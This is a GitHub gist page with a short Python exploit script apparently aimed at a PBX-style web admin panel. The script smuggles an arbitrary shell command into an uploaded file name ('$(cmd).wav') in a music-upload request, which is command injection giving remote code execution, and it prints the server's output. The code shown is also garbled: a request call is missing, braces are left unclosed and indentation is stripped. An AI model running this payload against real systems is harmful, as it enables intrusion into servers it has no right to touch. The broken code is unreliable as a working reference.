Skip to content

Instantly share code, notes, and snippets.

Created August 9, 2018 09:49
What would you like to do?
import requests
from sys import argv
import base64
def main():
url = 'http://' + argv[1] + '/admin/ajax.php?module=music&command=upload'
cmd = argv[2]
multipart_form_data = {
'extension': (None, '0'),
'language': (None,'en'),
'filename': (None, 'fa.wav'),
'codec[1]': (None, 'gsm'),
'id': (None, '1'),
'files[1]': ('$(' + cmd + ').wav', 'exploit by @simonuvarov')
headers = {
'Referer': url + '/admin/ajax.php'
response =, files=multipart_form_data, headers=headers)
print(response.text.replace(b"\\n", b"\n"))
if __name__ == '__main__':
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment